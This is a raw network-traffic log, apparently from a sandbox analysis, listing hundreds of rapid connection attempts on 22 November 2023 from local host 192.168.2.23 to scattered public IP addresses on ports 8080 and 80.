Nov 22, 2023 08:37:49.409640074 CET	54329	8080	192.168.2.23	62.55.68.168
Nov 22, 2023 08:37:49.409641027 CET	54329	8080	192.168.2.23	95.15.54.233
Nov 22, 2023 08:37:49.409641027 CET	54329	8080	192.168.2.23	94.45.150.116
Nov 22, 2023 08:37:49.409655094 CET	54329	8080	192.168.2.23	62.201.141.187
Nov 22, 2023 08:37:49.409657955 CET	54329	8080	192.168.2.23	95.107.92.112
Nov 22, 2023 08:37:49.409658909 CET	54329	8080	192.168.2.23	31.103.127.181
Nov 22, 2023 08:37:49.409670115 CET	54329	8080	192.168.2.23	31.129.26.188
Nov 22, 2023 08:37:49.409670115 CET	54329	8080	192.168.2.23	95.130.120.138
Nov 22, 2023 08:37:49.409670115 CET	54329	8080	192.168.2.23	31.140.38.233
Nov 22, 2023 08:37:49.409671068 CET	54329	8080	192.168.2.23	94.92.245.139
Nov 22, 2023 08:37:49.409678936 CET	54329	8080	192.168.2.23	95.197.237.62
Nov 22, 2023 08:37:49.409679890 CET	54329	8080	192.168.2.23	95.137.246.68
Nov 22, 2023 08:37:49.409682989 CET	54329	8080	192.168.2.23	62.113.89.240
Nov 22, 2023 08:37:49.409703016 CET	54329	8080	192.168.2.23	95.12.232.64
Nov 22, 2023 08:37:49.409703970 CET	54329	8080	192.168.2.23	95.138.119.39
Nov 22, 2023 08:37:49.409704924 CET	54329	8080	192.168.2.23	94.209.195.235
Nov 22, 2023 08:37:49.409706116 CET	54329	8080	192.168.2.23	31.2.165.139
Nov 22, 2023 08:37:49.409707069 CET	54329	8080	192.168.2.23	94.184.120.184
Nov 22, 2023 08:37:49.409706116 CET	54329	8080	192.168.2.23	95.176.77.120
Nov 22, 2023 08:37:49.409706116 CET	54329	8080	192.168.2.23	95.12.150.38
Nov 22, 2023 08:37:49.409722090 CET	54329	8080	192.168.2.23	62.113.230.74
Nov 22, 2023 08:37:49.409723997 CET	54329	8080	192.168.2.23	95.51.120.64
Nov 22, 2023 08:37:49.409732103 CET	54329	8080	192.168.2.23	95.108.160.249
Nov 22, 2023 08:37:49.409743071 CET	54329	8080	192.168.2.23	85.220.220.111
Nov 22, 2023 08:37:49.409743071 CET	54329	8080	192.168.2.23	31.119.196.36
Nov 22, 2023 08:37:49.409743071 CET	54329	8080	192.168.2.23	85.85.101.4
Nov 22, 2023 08:37:49.409746885 CET	54329	8080	192.168.2.23	31.92.116.45
Nov 22, 2023 08:37:49.409746885 CET	54329	8080	192.168.2.23	95.245.229.196
Nov 22, 2023 08:37:49.409746885 CET	54329	8080	192.168.2.23	94.158.249.127
Nov 22, 2023 08:37:49.409749031 CET	54329	8080	192.168.2.23	62.141.130.127
Nov 22, 2023 08:37:49.409749031 CET	54329	8080	192.168.2.23	85.247.17.32
Nov 22, 2023 08:37:49.409754992 CET	54329	8080	192.168.2.23	62.90.75.162
Nov 22, 2023 08:37:49.409763098 CET	54329	8080	192.168.2.23	85.121.234.79
Nov 22, 2023 08:37:49.409765959 CET	54329	8080	192.168.2.23	31.3.189.145
Nov 22, 2023 08:37:49.409765959 CET	54329	8080	192.168.2.23	85.221.213.115
Nov 22, 2023 08:37:49.409766912 CET	54329	8080	192.168.2.23	94.133.202.178
Nov 22, 2023 08:37:49.409766912 CET	54329	8080	192.168.2.23	31.81.41.141
Nov 22, 2023 08:37:49.409771919 CET	54329	8080	192.168.2.23	31.120.213.179
Nov 22, 2023 08:37:49.409782887 CET	54329	8080	192.168.2.23	62.51.197.178
Nov 22, 2023 08:37:49.409785986 CET	54329	8080	192.168.2.23	85.129.124.198
Nov 22, 2023 08:37:49.409787893 CET	54329	8080	192.168.2.23	95.211.212.7
Nov 22, 2023 08:37:49.409789085 CET	54329	8080	192.168.2.23	85.224.249.28
Nov 22, 2023 08:37:49.409789085 CET	54329	8080	192.168.2.23	62.187.91.239
Nov 22, 2023 08:37:49.409795046 CET	54329	8080	192.168.2.23	31.145.228.199
Nov 22, 2023 08:37:49.409801006 CET	54329	8080	192.168.2.23	85.232.154.237
Nov 22, 2023 08:37:49.409801006 CET	54329	8080	192.168.2.23	95.13.206.10
Nov 22, 2023 08:37:49.409818888 CET	54329	8080	192.168.2.23	95.1.37.27
Nov 22, 2023 08:37:49.409818888 CET	54329	8080	192.168.2.23	95.74.181.51
Nov 22, 2023 08:37:49.409818888 CET	54329	8080	192.168.2.23	62.102.183.140
Nov 22, 2023 08:37:49.409820080 CET	54329	8080	192.168.2.23	62.206.107.30
Nov 22, 2023 08:37:49.409820080 CET	54329	8080	192.168.2.23	95.73.130.181
Nov 22, 2023 08:37:49.409826040 CET	54329	8080	192.168.2.23	85.109.186.215
Nov 22, 2023 08:37:49.409826040 CET	54329	8080	192.168.2.23	31.144.243.80
Nov 22, 2023 08:37:49.409836054 CET	54329	8080	192.168.2.23	85.148.43.140
Nov 22, 2023 08:37:49.409856081 CET	54329	8080	192.168.2.23	62.242.244.202
Nov 22, 2023 08:37:49.409857035 CET	54329	8080	192.168.2.23	94.16.209.194
Nov 22, 2023 08:37:49.409856081 CET	54329	8080	192.168.2.23	94.43.54.149
Nov 22, 2023 08:37:49.409872055 CET	54329	8080	192.168.2.23	94.182.83.66
Nov 22, 2023 08:37:49.409873009 CET	54329	8080	192.168.2.23	95.51.100.114
Nov 22, 2023 08:37:49.409878969 CET	54329	8080	192.168.2.23	94.127.32.97
Nov 22, 2023 08:37:49.409879923 CET	54329	8080	192.168.2.23	95.10.209.23
Nov 22, 2023 08:37:49.409881115 CET	54329	8080	192.168.2.23	62.154.73.64
Nov 22, 2023 08:37:49.409890890 CET	54329	8080	192.168.2.23	94.30.140.14
Nov 22, 2023 08:37:49.409900904 CET	54329	8080	192.168.2.23	31.109.150.16
Nov 22, 2023 08:37:49.409900904 CET	54329	8080	192.168.2.23	31.149.174.159
Nov 22, 2023 08:37:49.409903049 CET	54329	8080	192.168.2.23	94.103.15.172
Nov 22, 2023 08:37:49.409903049 CET	54329	8080	192.168.2.23	85.210.174.20
Nov 22, 2023 08:37:49.409918070 CET	54329	8080	192.168.2.23	31.29.141.180
Nov 22, 2023 08:37:49.409925938 CET	54329	8080	192.168.2.23	62.66.101.195
Nov 22, 2023 08:37:49.409926891 CET	54329	8080	192.168.2.23	31.170.155.44
Nov 22, 2023 08:37:49.409926891 CET	54329	8080	192.168.2.23	95.75.20.154
Nov 22, 2023 08:37:49.409929037 CET	54329	8080	192.168.2.23	85.105.4.5
Nov 22, 2023 08:37:49.409929991 CET	54329	8080	192.168.2.23	31.141.193.6
Nov 22, 2023 08:37:49.409926891 CET	54329	8080	192.168.2.23	85.47.39.49
Nov 22, 2023 08:37:49.409929991 CET	54329	8080	192.168.2.23	94.55.173.247
Nov 22, 2023 08:37:49.409929991 CET	54329	8080	192.168.2.23	95.70.210.44
Nov 22, 2023 08:37:49.409940004 CET	54329	8080	192.168.2.23	62.73.62.198
Nov 22, 2023 08:37:49.409940958 CET	54329	8080	192.168.2.23	94.193.200.143
Nov 22, 2023 08:37:49.409940958 CET	54329	8080	192.168.2.23	94.19.67.82
Nov 22, 2023 08:37:49.409940958 CET	54329	8080	192.168.2.23	85.144.71.66
Nov 22, 2023 08:37:49.409945965 CET	54329	8080	192.168.2.23	95.155.14.238
Nov 22, 2023 08:37:49.409960032 CET	54329	8080	192.168.2.23	31.251.83.5
Nov 22, 2023 08:37:49.409960032 CET	54329	8080	192.168.2.23	95.192.222.181
Nov 22, 2023 08:37:49.409979105 CET	54329	8080	192.168.2.23	94.67.105.110
Nov 22, 2023 08:37:49.409979105 CET	54329	8080	192.168.2.23	85.61.249.17
Nov 22, 2023 08:37:49.409981012 CET	54329	8080	192.168.2.23	95.8.118.214
Nov 22, 2023 08:37:49.409984112 CET	54329	8080	192.168.2.23	62.27.60.89
Nov 22, 2023 08:37:49.409984112 CET	54329	8080	192.168.2.23	94.170.148.32
Nov 22, 2023 08:37:49.409991980 CET	54329	8080	192.168.2.23	94.180.49.11
Nov 22, 2023 08:37:49.410001993 CET	54329	8080	192.168.2.23	62.117.209.62
Nov 22, 2023 08:37:49.410005093 CET	54329	8080	192.168.2.23	31.247.72.83
Nov 22, 2023 08:37:49.410006046 CET	54329	8080	192.168.2.23	85.204.7.22
Nov 22, 2023 08:37:49.410012960 CET	54329	8080	192.168.2.23	95.21.142.119
Nov 22, 2023 08:37:49.410016060 CET	54329	8080	192.168.2.23	95.196.152.40
Nov 22, 2023 08:37:49.410017967 CET	54329	8080	192.168.2.23	94.7.242.9
Nov 22, 2023 08:37:49.410022974 CET	54329	8080	192.168.2.23	62.52.60.133
Nov 22, 2023 08:37:49.410024881 CET	54329	8080	192.168.2.23	95.89.153.253
Nov 22, 2023 08:37:49.410026073 CET	54329	8080	192.168.2.23	31.225.140.160
Nov 22, 2023 08:37:49.410032988 CET	54329	8080	192.168.2.23	62.122.209.84
Nov 22, 2023 08:37:49.410032988 CET	54329	8080	192.168.2.23	62.8.116.198
Nov 22, 2023 08:37:49.410034895 CET	54329	8080	192.168.2.23	85.37.171.26
Nov 22, 2023 08:37:49.410038948 CET	54329	8080	192.168.2.23	62.97.136.168
Nov 22, 2023 08:37:49.410038948 CET	54329	8080	192.168.2.23	95.174.170.145
Nov 22, 2023 08:37:49.410043955 CET	54329	8080	192.168.2.23	94.134.4.97
Nov 22, 2023 08:37:49.410043955 CET	54329	8080	192.168.2.23	85.186.102.228
Nov 22, 2023 08:37:49.410043955 CET	54329	8080	192.168.2.23	94.174.160.249
Nov 22, 2023 08:37:49.410046101 CET	54329	8080	192.168.2.23	95.180.200.58
Nov 22, 2023 08:37:49.410058975 CET	54329	8080	192.168.2.23	62.154.244.144
Nov 22, 2023 08:37:49.410058975 CET	54329	8080	192.168.2.23	85.125.251.7
Nov 22, 2023 08:37:49.410068989 CET	54329	8080	192.168.2.23	94.77.190.82
Nov 22, 2023 08:37:49.410068989 CET	54329	8080	192.168.2.23	62.55.166.140
Nov 22, 2023 08:37:49.410079002 CET	54329	8080	192.168.2.23	94.194.192.207
Nov 22, 2023 08:37:49.410079002 CET	54329	8080	192.168.2.23	31.10.119.120
Nov 22, 2023 08:37:49.410080910 CET	54329	8080	192.168.2.23	31.114.82.127
Nov 22, 2023 08:37:49.410082102 CET	54329	8080	192.168.2.23	85.30.143.165
Nov 22, 2023 08:37:49.410089970 CET	54329	8080	192.168.2.23	95.156.104.151
Nov 22, 2023 08:37:49.410098076 CET	54329	8080	192.168.2.23	94.171.43.38
Nov 22, 2023 08:37:49.410099983 CET	54329	8080	192.168.2.23	31.72.151.172
Nov 22, 2023 08:37:49.410113096 CET	54329	8080	192.168.2.23	31.112.71.113
Nov 22, 2023 08:37:49.410129070 CET	54329	8080	192.168.2.23	31.23.32.62
Nov 22, 2023 08:37:49.410129070 CET	54329	8080	192.168.2.23	31.126.208.191
Nov 22, 2023 08:37:49.410130978 CET	54329	8080	192.168.2.23	62.174.40.159
Nov 22, 2023 08:37:49.410132885 CET	54329	8080	192.168.2.23	94.216.214.169
Nov 22, 2023 08:37:49.410132885 CET	54329	8080	192.168.2.23	95.20.238.9
Nov 22, 2023 08:37:49.410132885 CET	54329	8080	192.168.2.23	31.118.187.38
Nov 22, 2023 08:37:49.410139084 CET	54329	8080	192.168.2.23	85.88.89.247
Nov 22, 2023 08:37:49.410145998 CET	54329	8080	192.168.2.23	31.15.199.253
Nov 22, 2023 08:37:49.410161018 CET	54329	8080	192.168.2.23	85.151.186.108
Nov 22, 2023 08:37:49.410166025 CET	54329	8080	192.168.2.23	85.8.173.126
Nov 22, 2023 08:37:49.410170078 CET	54329	8080	192.168.2.23	94.240.25.31
Nov 22, 2023 08:37:49.410177946 CET	54329	8080	192.168.2.23	95.107.119.138
Nov 22, 2023 08:37:49.410178900 CET	54329	8080	192.168.2.23	95.148.68.10
Nov 22, 2023 08:37:49.410178900 CET	54329	8080	192.168.2.23	95.126.153.167
Nov 22, 2023 08:37:49.410206079 CET	54329	8080	192.168.2.23	31.46.169.217
Nov 22, 2023 08:37:49.410206079 CET	54329	8080	192.168.2.23	95.48.204.215
Nov 22, 2023 08:37:49.410214901 CET	54329	8080	192.168.2.23	94.152.109.2
Nov 22, 2023 08:37:49.410232067 CET	54329	8080	192.168.2.23	94.42.97.252
Nov 22, 2023 08:37:49.410235882 CET	54329	8080	192.168.2.23	94.180.130.160
Nov 22, 2023 08:37:49.410235882 CET	54329	8080	192.168.2.23	94.205.196.94
Nov 22, 2023 08:37:49.410235882 CET	54329	8080	192.168.2.23	31.82.143.26
Nov 22, 2023 08:37:49.410237074 CET	54329	8080	192.168.2.23	95.118.100.204
Nov 22, 2023 08:37:49.410238028 CET	54329	8080	192.168.2.23	31.188.249.96
Nov 22, 2023 08:37:49.410238028 CET	54329	8080	192.168.2.23	85.184.233.250
Nov 22, 2023 08:37:49.410243988 CET	54329	8080	192.168.2.23	62.144.22.229
Nov 22, 2023 08:37:49.410244942 CET	54329	8080	192.168.2.23	94.247.228.238
Nov 22, 2023 08:37:49.410244942 CET	54329	8080	192.168.2.23	94.152.177.41
Nov 22, 2023 08:37:49.410244942 CET	54329	8080	192.168.2.23	95.157.55.174
Nov 22, 2023 08:37:49.410252094 CET	54329	8080	192.168.2.23	94.252.177.127
Nov 22, 2023 08:37:49.410254002 CET	54329	8080	192.168.2.23	94.75.244.223
Nov 22, 2023 08:37:49.410263062 CET	54329	8080	192.168.2.23	85.103.143.232
Nov 22, 2023 08:37:49.410267115 CET	54329	8080	192.168.2.23	31.157.175.251
Nov 22, 2023 08:37:49.410267115 CET	54329	8080	192.168.2.23	94.5.68.35
Nov 22, 2023 08:37:49.410285950 CET	54329	8080	192.168.2.23	62.30.249.84
Nov 22, 2023 08:37:49.410286903 CET	54329	8080	192.168.2.23	95.129.219.225
Nov 22, 2023 08:37:49.410286903 CET	54329	8080	192.168.2.23	85.115.202.251
Nov 22, 2023 08:37:49.410306931 CET	54329	8080	192.168.2.23	94.9.177.195
Nov 22, 2023 08:37:49.410306931 CET	54329	8080	192.168.2.23	31.233.66.174
Nov 22, 2023 08:37:49.410306931 CET	54329	8080	192.168.2.23	94.157.52.130
Nov 22, 2023 08:37:49.410307884 CET	54329	8080	192.168.2.23	62.63.26.254
Nov 22, 2023 08:37:49.410307884 CET	54329	8080	192.168.2.23	95.119.57.175
Nov 22, 2023 08:37:49.410320044 CET	54329	8080	192.168.2.23	94.105.126.71
Nov 22, 2023 08:37:49.410324097 CET	54329	8080	192.168.2.23	85.37.182.7
Nov 22, 2023 08:37:49.410335064 CET	54329	8080	192.168.2.23	95.174.8.127
Nov 22, 2023 08:37:49.410335064 CET	54329	8080	192.168.2.23	31.145.235.142
Nov 22, 2023 08:37:49.410351038 CET	54329	8080	192.168.2.23	31.144.255.14
Nov 22, 2023 08:37:49.410351992 CET	54329	8080	192.168.2.23	31.66.15.180
Nov 22, 2023 08:37:49.410377026 CET	54329	8080	192.168.2.23	85.111.164.125
Nov 22, 2023 08:37:49.410379887 CET	54329	8080	192.168.2.23	94.115.38.226
Nov 22, 2023 08:37:49.410393953 CET	54329	8080	192.168.2.23	95.80.2.94
Nov 22, 2023 08:37:49.410393953 CET	54329	8080	192.168.2.23	85.111.35.197
Nov 22, 2023 08:37:49.410393953 CET	54329	8080	192.168.2.23	31.10.241.185
Nov 22, 2023 08:37:49.410398006 CET	54329	8080	192.168.2.23	94.213.145.162
Nov 22, 2023 08:37:49.410398006 CET	54329	8080	192.168.2.23	94.21.142.8
Nov 22, 2023 08:37:49.410415888 CET	54329	8080	192.168.2.23	85.195.93.56
Nov 22, 2023 08:37:49.410417080 CET	54329	8080	192.168.2.23	31.81.154.226
Nov 22, 2023 08:37:49.410418987 CET	54329	8080	192.168.2.23	94.155.231.57
Nov 22, 2023 08:37:49.410419941 CET	54329	8080	192.168.2.23	85.7.46.86
Nov 22, 2023 08:37:49.410419941 CET	54329	8080	192.168.2.23	31.164.239.92
Nov 22, 2023 08:37:49.410420895 CET	54329	8080	192.168.2.23	95.147.198.242
Nov 22, 2023 08:37:49.410423994 CET	54329	8080	192.168.2.23	94.179.186.193
Nov 22, 2023 08:37:49.410434961 CET	54329	8080	192.168.2.23	31.131.197.208
Nov 22, 2023 08:37:49.410434961 CET	54329	8080	192.168.2.23	95.250.186.121
Nov 22, 2023 08:37:49.410434961 CET	54329	8080	192.168.2.23	62.11.207.252
Nov 22, 2023 08:37:49.410437107 CET	54329	8080	192.168.2.23	62.84.42.133
Nov 22, 2023 08:37:49.410437107 CET	54329	8080	192.168.2.23	94.0.9.82
Nov 22, 2023 08:37:49.410439014 CET	54329	8080	192.168.2.23	31.80.159.189
Nov 22, 2023 08:37:49.410439014 CET	54329	8080	192.168.2.23	94.116.134.200
Nov 22, 2023 08:37:49.410443068 CET	54329	8080	192.168.2.23	94.66.84.151
Nov 22, 2023 08:37:49.410443068 CET	54329	8080	192.168.2.23	31.62.226.111
Nov 22, 2023 08:37:49.410455942 CET	54329	8080	192.168.2.23	85.82.125.204
Nov 22, 2023 08:37:49.410455942 CET	54329	8080	192.168.2.23	62.99.172.60
Nov 22, 2023 08:37:49.410459042 CET	54329	8080	192.168.2.23	62.87.172.84
Nov 22, 2023 08:37:49.410460949 CET	54329	8080	192.168.2.23	85.75.14.97
Nov 22, 2023 08:37:49.410463095 CET	54329	8080	192.168.2.23	31.245.150.24
Nov 22, 2023 08:37:49.410463095 CET	54329	8080	192.168.2.23	85.55.88.118
Nov 22, 2023 08:37:49.410470963 CET	54329	8080	192.168.2.23	95.227.184.93
Nov 22, 2023 08:37:49.410470963 CET	54329	8080	192.168.2.23	31.187.87.64
Nov 22, 2023 08:37:49.410475969 CET	54329	8080	192.168.2.23	31.172.157.82
Nov 22, 2023 08:37:49.410494089 CET	54329	8080	192.168.2.23	95.38.154.88
Nov 22, 2023 08:37:49.410494089 CET	54329	8080	192.168.2.23	62.43.2.199
Nov 22, 2023 08:37:49.410495043 CET	54329	8080	192.168.2.23	31.144.178.58
Nov 22, 2023 08:37:49.410495043 CET	54329	8080	192.168.2.23	31.19.14.232
Nov 22, 2023 08:37:49.410497904 CET	54329	8080	192.168.2.23	95.203.230.126
Nov 22, 2023 08:37:49.410497904 CET	54329	8080	192.168.2.23	94.139.168.175
Nov 22, 2023 08:37:49.410501957 CET	54329	8080	192.168.2.23	31.237.203.57
Nov 22, 2023 08:37:49.410509109 CET	54329	8080	192.168.2.23	85.16.92.153
Nov 22, 2023 08:37:49.410509109 CET	54329	8080	192.168.2.23	94.66.138.53
Nov 22, 2023 08:37:49.410512924 CET	54329	8080	192.168.2.23	85.51.134.129
Nov 22, 2023 08:37:49.410512924 CET	54329	8080	192.168.2.23	85.234.240.146
Nov 22, 2023 08:37:49.410520077 CET	54329	8080	192.168.2.23	31.105.243.159
Nov 22, 2023 08:37:49.410522938 CET	54329	8080	192.168.2.23	31.246.213.179
Nov 22, 2023 08:37:49.410523891 CET	54329	8080	192.168.2.23	85.136.175.168
Nov 22, 2023 08:37:49.410526991 CET	54329	8080	192.168.2.23	31.223.122.212
Nov 22, 2023 08:37:49.410526991 CET	54329	8080	192.168.2.23	94.182.92.139
Nov 22, 2023 08:37:49.410531044 CET	54329	8080	192.168.2.23	85.205.194.159
Nov 22, 2023 08:37:49.410531044 CET	54329	8080	192.168.2.23	95.162.127.118
Nov 22, 2023 08:37:49.410533905 CET	54329	8080	192.168.2.23	95.62.200.166
Nov 22, 2023 08:37:49.410533905 CET	54329	8080	192.168.2.23	62.149.8.95
Nov 22, 2023 08:37:49.410542011 CET	54329	8080	192.168.2.23	85.51.249.238
Nov 22, 2023 08:37:49.410545111 CET	54329	8080	192.168.2.23	85.181.165.17
Nov 22, 2023 08:37:49.410545111 CET	54329	8080	192.168.2.23	85.63.47.229
Nov 22, 2023 08:37:49.410554886 CET	54329	8080	192.168.2.23	94.221.250.200
Nov 22, 2023 08:37:49.410558939 CET	54329	8080	192.168.2.23	62.75.241.196
Nov 22, 2023 08:37:49.410563946 CET	54329	8080	192.168.2.23	94.236.99.1
Nov 22, 2023 08:37:49.410567999 CET	54329	8080	192.168.2.23	31.121.137.130
Nov 22, 2023 08:37:49.410588026 CET	54329	8080	192.168.2.23	95.189.221.113
Nov 22, 2023 08:37:49.410590887 CET	54329	8080	192.168.2.23	31.95.28.241
Nov 22, 2023 08:37:49.410590887 CET	54329	8080	192.168.2.23	85.38.124.209
Nov 22, 2023 08:37:49.410590887 CET	54329	8080	192.168.2.23	62.56.9.227
Nov 22, 2023 08:37:49.410590887 CET	54329	8080	192.168.2.23	95.23.134.103
Nov 22, 2023 08:37:49.410614014 CET	54329	8080	192.168.2.23	85.178.167.185
Nov 22, 2023 08:37:49.410624981 CET	54329	8080	192.168.2.23	94.237.182.112
Nov 22, 2023 08:37:49.410631895 CET	54329	8080	192.168.2.23	62.26.185.251
Nov 22, 2023 08:37:49.410631895 CET	54329	8080	192.168.2.23	94.16.193.103
Nov 22, 2023 08:37:49.410633087 CET	54329	8080	192.168.2.23	62.167.125.10
Nov 22, 2023 08:37:49.410633087 CET	54329	8080	192.168.2.23	94.91.81.109
Nov 22, 2023 08:37:49.410633087 CET	54329	8080	192.168.2.23	31.189.80.242
Nov 22, 2023 08:37:49.410645962 CET	54329	8080	192.168.2.23	31.175.204.65
Nov 22, 2023 08:37:49.410646915 CET	54329	8080	192.168.2.23	94.120.52.194
Nov 22, 2023 08:37:49.410645962 CET	54329	8080	192.168.2.23	85.103.90.79
Nov 22, 2023 08:37:49.410646915 CET	54329	8080	192.168.2.23	62.82.193.79
Nov 22, 2023 08:37:49.410648108 CET	54329	8080	192.168.2.23	62.4.77.18
Nov 22, 2023 08:37:49.410650015 CET	54329	8080	192.168.2.23	95.148.186.187
Nov 22, 2023 08:37:49.410653114 CET	54329	8080	192.168.2.23	85.127.13.249
Nov 22, 2023 08:37:49.410665035 CET	54329	8080	192.168.2.23	31.115.72.122
Nov 22, 2023 08:37:49.410669088 CET	54329	8080	192.168.2.23	62.98.78.35
Nov 22, 2023 08:37:49.410669088 CET	54329	8080	192.168.2.23	62.190.112.189
Nov 22, 2023 08:37:49.410670042 CET	54329	8080	192.168.2.23	94.175.152.224
Nov 22, 2023 08:37:49.410676956 CET	54329	8080	192.168.2.23	62.195.24.174
Nov 22, 2023 08:37:49.410685062 CET	54329	8080	192.168.2.23	85.144.249.150
Nov 22, 2023 08:37:49.410690069 CET	54329	8080	192.168.2.23	95.125.197.181
Nov 22, 2023 08:37:49.410691977 CET	54329	8080	192.168.2.23	94.189.235.248
Nov 22, 2023 08:37:49.410701990 CET	54329	8080	192.168.2.23	62.180.230.58
Nov 22, 2023 08:37:49.410716057 CET	54329	8080	192.168.2.23	62.81.49.30
Nov 22, 2023 08:37:49.410727978 CET	54329	8080	192.168.2.23	95.138.121.106
Nov 22, 2023 08:37:49.410733938 CET	54329	8080	192.168.2.23	62.55.176.109
Nov 22, 2023 08:37:49.410733938 CET	54329	8080	192.168.2.23	85.248.84.144
Nov 22, 2023 08:37:49.410734892 CET	54329	8080	192.168.2.23	62.159.232.51
Nov 22, 2023 08:37:49.410739899 CET	54329	8080	192.168.2.23	31.13.254.245
Nov 22, 2023 08:37:49.410748959 CET	54329	8080	192.168.2.23	62.62.82.197
Nov 22, 2023 08:37:49.410762072 CET	54329	8080	192.168.2.23	85.175.29.30
Nov 22, 2023 08:37:49.410762072 CET	54329	8080	192.168.2.23	31.71.153.166
Nov 22, 2023 08:37:49.410768032 CET	54329	8080	192.168.2.23	31.227.34.151
Nov 22, 2023 08:37:49.410768032 CET	54329	8080	192.168.2.23	85.52.40.68
Nov 22, 2023 08:37:49.410768032 CET	54329	8080	192.168.2.23	62.114.225.16
Nov 22, 2023 08:37:49.410773993 CET	54329	8080	192.168.2.23	94.47.147.106
Nov 22, 2023 08:37:49.410788059 CET	54329	8080	192.168.2.23	31.101.160.47
Nov 22, 2023 08:37:49.410799980 CET	54329	8080	192.168.2.23	62.195.218.168
Nov 22, 2023 08:37:49.410799980 CET	54329	8080	192.168.2.23	95.89.249.74
Nov 22, 2023 08:37:49.410809040 CET	54329	8080	192.168.2.23	85.241.182.4
Nov 22, 2023 08:37:49.410809040 CET	54329	8080	192.168.2.23	94.97.102.253
Nov 22, 2023 08:37:49.410809040 CET	54329	8080	192.168.2.23	62.130.202.135
Nov 22, 2023 08:37:49.410819054 CET	54329	8080	192.168.2.23	31.45.227.133
Nov 22, 2023 08:37:49.410828114 CET	54329	8080	192.168.2.23	62.209.173.195
Nov 22, 2023 08:37:49.410836935 CET	54329	8080	192.168.2.23	62.99.175.213
Nov 22, 2023 08:37:49.410837889 CET	54329	8080	192.168.2.23	31.169.214.118
Nov 22, 2023 08:37:49.410842896 CET	54329	8080	192.168.2.23	94.25.104.127
Nov 22, 2023 08:37:49.410842896 CET	54329	8080	192.168.2.23	95.93.223.53
Nov 22, 2023 08:37:49.410861015 CET	54329	8080	192.168.2.23	31.172.7.166
Nov 22, 2023 08:37:49.410862923 CET	54329	8080	192.168.2.23	85.142.58.111
Nov 22, 2023 08:37:49.410862923 CET	54329	8080	192.168.2.23	31.162.149.190
Nov 22, 2023 08:37:49.410877943 CET	54329	8080	192.168.2.23	31.156.125.197
Nov 22, 2023 08:37:49.410877943 CET	54329	8080	192.168.2.23	62.8.117.67
Nov 22, 2023 08:37:49.410877943 CET	54329	8080	192.168.2.23	62.89.50.172
Nov 22, 2023 08:37:49.410877943 CET	54329	8080	192.168.2.23	94.83.210.220
Nov 22, 2023 08:37:49.410883904 CET	54329	8080	192.168.2.23	31.234.254.228
Nov 22, 2023 08:37:49.410888910 CET	54329	8080	192.168.2.23	85.81.188.40
Nov 22, 2023 08:37:49.410888910 CET	54329	8080	192.168.2.23	94.203.74.151
Nov 22, 2023 08:37:49.410902977 CET	54329	8080	192.168.2.23	85.93.145.252
Nov 22, 2023 08:37:49.410902977 CET	54329	8080	192.168.2.23	94.223.206.161
Nov 22, 2023 08:37:49.410903931 CET	54329	8080	192.168.2.23	62.142.194.76
Nov 22, 2023 08:37:49.410909891 CET	54329	8080	192.168.2.23	31.248.13.54
Nov 22, 2023 08:37:49.410919905 CET	54329	8080	192.168.2.23	94.111.3.211
Nov 22, 2023 08:37:49.410922050 CET	54329	8080	192.168.2.23	95.198.85.25
Nov 22, 2023 08:37:49.410922050 CET	54329	8080	192.168.2.23	62.218.5.203
Nov 22, 2023 08:37:49.410933018 CET	54329	8080	192.168.2.23	94.14.204.36
Nov 22, 2023 08:37:49.410933018 CET	54329	8080	192.168.2.23	31.242.222.30
Nov 22, 2023 08:37:49.410945892 CET	54329	8080	192.168.2.23	31.172.50.158
Nov 22, 2023 08:37:49.410953999 CET	54329	8080	192.168.2.23	85.11.64.91
Nov 22, 2023 08:37:49.410963058 CET	54329	8080	192.168.2.23	85.9.16.112
Nov 22, 2023 08:37:49.410969973 CET	54329	8080	192.168.2.23	94.21.142.248
Nov 22, 2023 08:37:49.410969973 CET	54329	8080	192.168.2.23	95.237.168.199
Nov 22, 2023 08:37:49.410972118 CET	54329	8080	192.168.2.23	94.173.162.15
Nov 22, 2023 08:37:49.410974979 CET	54329	8080	192.168.2.23	62.183.60.240
Nov 22, 2023 08:37:49.410975933 CET	54329	8080	192.168.2.23	62.60.94.20
Nov 22, 2023 08:37:49.410975933 CET	54329	8080	192.168.2.23	62.134.81.229
Nov 22, 2023 08:37:49.410976887 CET	54329	8080	192.168.2.23	94.61.19.162
Nov 22, 2023 08:37:49.419857979 CET	54328	80	192.168.2.23	95.83.71.21
Nov 22, 2023 08:37:49.419858932 CET	54328	80	192.168.2.23	95.95.249.60
Nov 22, 2023 08:37:49.419898033 CET	54328	80	192.168.2.23	95.222.153.47
Nov 22, 2023 08:37:49.419930935 CET	54328	80	192.168.2.23	95.69.245.91
Nov 22, 2023 08:37:49.419956923 CET	54328	80	192.168.2.23	95.161.194.77
Nov 22, 2023 08:37:49.419970989 CET	54328	80	192.168.2.23	95.205.141.148
Nov 22, 2023 08:37:49.419970989 CET	54328	80	192.168.2.23	95.195.237.76
Nov 22, 2023 08:37:49.420036077 CET	54328	80	192.168.2.23	95.137.70.141
Nov 22, 2023 08:37:49.420041084 CET	54328	80	192.168.2.23	95.95.150.79
Nov 22, 2023 08:37:49.420067072 CET	54328	80	192.168.2.23	95.65.205.183
Nov 22, 2023 08:37:49.420136929 CET	54328	80	192.168.2.23	95.164.99.189
Nov 22, 2023 08:37:49.420142889 CET	54328	80	192.168.2.23	95.85.248.171
Nov 22, 2023 08:37:49.420157909 CET	54328	80	192.168.2.23	95.183.63.60
Nov 22, 2023 08:37:49.420186996 CET	54328	80	192.168.2.23	95.13.252.42
Nov 22, 2023 08:37:49.420219898 CET	54328	80	192.168.2.23	95.203.27.160
Nov 22, 2023 08:37:49.420242071 CET	54328	80	192.168.2.23	95.125.240.61
Nov 22, 2023 08:37:49.420279980 CET	54328	80	192.168.2.23	95.45.114.135
Nov 22, 2023 08:37:49.420295954 CET	54328	80	192.168.2.23	95.13.162.210
Nov 22, 2023 08:37:49.420317888 CET	54328	80	192.168.2.23	95.89.141.242
Nov 22, 2023 08:37:49.420334101 CET	54328	80	192.168.2.23	95.61.118.241
Nov 22, 2023 08:37:49.420341969 CET	54328	80	192.168.2.23	95.20.87.232
Nov 22, 2023 08:37:49.420387030 CET	54328	80	192.168.2.23	95.191.43.164
Nov 22, 2023 08:37:49.420403004 CET	54328	80	192.168.2.23	95.188.185.98
Nov 22, 2023 08:37:49.420469999 CET	54328	80	192.168.2.23	95.16.205.144
Nov 22, 2023 08:37:49.420469999 CET	54328	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:49.420526028 CET	54328	80	192.168.2.23	95.177.110.46
